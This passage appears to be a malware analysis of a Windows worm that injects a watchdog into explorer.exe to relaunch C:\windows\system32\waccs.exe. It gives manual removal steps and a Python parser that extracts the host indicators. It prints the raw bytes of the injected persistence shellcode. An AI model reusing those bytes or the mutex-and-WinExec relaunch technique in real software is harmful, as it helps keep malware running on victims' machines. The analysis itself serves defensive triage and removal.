00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
74 33 78 30 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00
Injected code segment (raw bytes):
55 8B EC 83 EC 08 6A 00 68 80 00 00 00 6A 03 6A
00 6A 01 68 00 00 00 80 8B 45 08 83 C0 1C 50 8B
4D 08 FF 51 04 89 45 F8 BA 01 00 00 00 85 D2 74
72 8B 45 08 05 20 01 00 00 50 6A 00 6A 00 8B 4D
08 FF 51 08 89 45 FC 8B 55 08 FF 52 0C 3D B7 00
00 00 74 2F 8B 45 F8 50 8B 4D 08 FF 11 8B 55 FC
52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12
6A 00 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 18 33
C0 EB 22 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC
51 8B 55 08 FF 12 68 10 27 00 00 8B 45 08 FF 50
14 EB 85 33 C0 8B E5 5D C2 04 00 55
----------------------------------------------------------
----------------------------------------------------------------------------------------------------
****************************************************************************************************
III. Manual removal steps (tested and effective on a real system):
1: Terminate the virus's guard process "explorer.exe" (the system desktop program).
2: Terminate the virus process "C:\windows\system32\waccs.exe".
3: Delete the virus program file "C:\windows\system32\waccs.exe".
4: Restart the system desktop program "C:\windows\explorer.exe"; the removal is complete.
****************************************************************************************************
////////////////////////////////////////////////////////////////////////////////////////////////////
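The injected watchdog reaches every API through a parameter block (the "injected data segment" above): seven function pointers at offsets +0 to +0x18, the executable path at +0x1C, and the mutex name at +0x120. Pulling the host indicators (file path, mutex name) out of such a dumped block is a routine triage step, so here is an added Python example that does it. This is editor-written code, not the worm's code or anything from the post's author; the slot order is taken from the call sites in the listing ([ECX] CloseHandle, [ECX+4] CreateFileA, [ECX+8] CreateMutexA, [EDX+C] RtlGetLastWin32Error, [EAX+10] ReleaseMutex, [EAX+14] Sleep, [ECX+18] WinExec), and the sample block is rebuilt from the hex dump at 0012F550.

```python
"""Parse the parameter block handed to the explorer.exe watchdog shellcode.

Layout inferred from the disassembly of the injected code:
  +0x000  7 x DWORD   API pointers, in the order the shellcode calls them
  +0x01C  char[0x104] NUL-terminated path passed to CreateFileA / WinExec
  +0x120  char[]      NUL-terminated mutex name passed to CreateMutexA
0x1C + 0x104 == 0x120, i.e. the path field is exactly MAX_PATH bytes.
"""
import struct

# Slot order taken from the call sites in the injected code listing.
API_SLOTS = (
    "CloseHandle",           # [ECX]
    "CreateFileA",           # [ECX+4]
    "CreateMutexA",          # [ECX+8]
    "RtlGetLastWin32Error",  # [EDX+C]
    "ReleaseMutex",          # [EAX+10]
    "Sleep",                 # [EAX+14]
    "WinExec",               # [ECX+18]
)
PATH_OFFSET = 0x1C
PATH_SIZE = 0x104            # MAX_PATH
MUTEX_OFFSET = PATH_OFFSET + PATH_SIZE   # 0x120
ERROR_ALREADY_EXISTS = 0xB7  # value the shellcode compares GetLastError against


def _cstring(buf: bytes, offset: int, limit: int) -> str:
    """Read a NUL-terminated ASCII string of at most `limit` bytes."""
    field = buf[offset:offset + limit]
    end = field.find(b"\x00")
    return (field if end < 0 else field[:end]).decode("latin-1")


def parse_watchdog_block(block: bytes) -> dict:
    """Return the API table and the two host indicators carried by the block."""
    if len(block) < MUTEX_OFFSET + 1:
        raise ValueError("block is shorter than the layout the shellcode expects")
    ptrs = struct.unpack_from("<7I", block, 0)
    return {
        "imports": dict(zip(API_SLOTS, ptrs)),
        "path": _cstring(block, PATH_OFFSET, PATH_SIZE),
        "mutex": _cstring(block, MUTEX_OFFSET, len(block) - MUTEX_OFFSET),
    }


def build_sample_block() -> bytes:
    """Rebuild the 0x161-byte block from the stack dump in the post (0012F550..0012F6B0)."""
    ptrs = struct.pack("<7I", 0x7C809B47, 0x7C801A24, 0x7C80E93F, 0x7C930331,
                       0x7C8024A7, 0x7C802442, 0x7C86136D)
    path = b"C:\\WINDOWS\\system32\\waccs.exe".ljust(PATH_SIZE, b"\x00")
    mutex = b"t3x0".ljust(0x41, b"\x00")     # 0x670..0x6B0 in the dump
    return ptrs + path + mutex


def describe_watchdog_decision(last_error: int) -> str:
    """Mirror the branch at 01A50052: ERROR_ALREADY_EXISTS means the main
    process still holds the mutex, anything else makes the watchdog relaunch it."""
    return "sleep_and_recheck" if last_error == ERROR_ALREADY_EXISTS else "relaunch"


if __name__ == "__main__":
    info = parse_watchdog_block(build_sample_block())
    for name, addr in info["imports"].items():
        print(f"{name:<22} {addr:08X}")
    print("path :", info["path"])
    print("mutex:", info["mutex"])
```

The two strings the parser returns are the indicators the manual removal steps rely on: the file that step 3 deletes and the mutex name whose absence makes the watchdog in explorer.exe call WinExec again, which is why step 1 terminates explorer.exe before step 2.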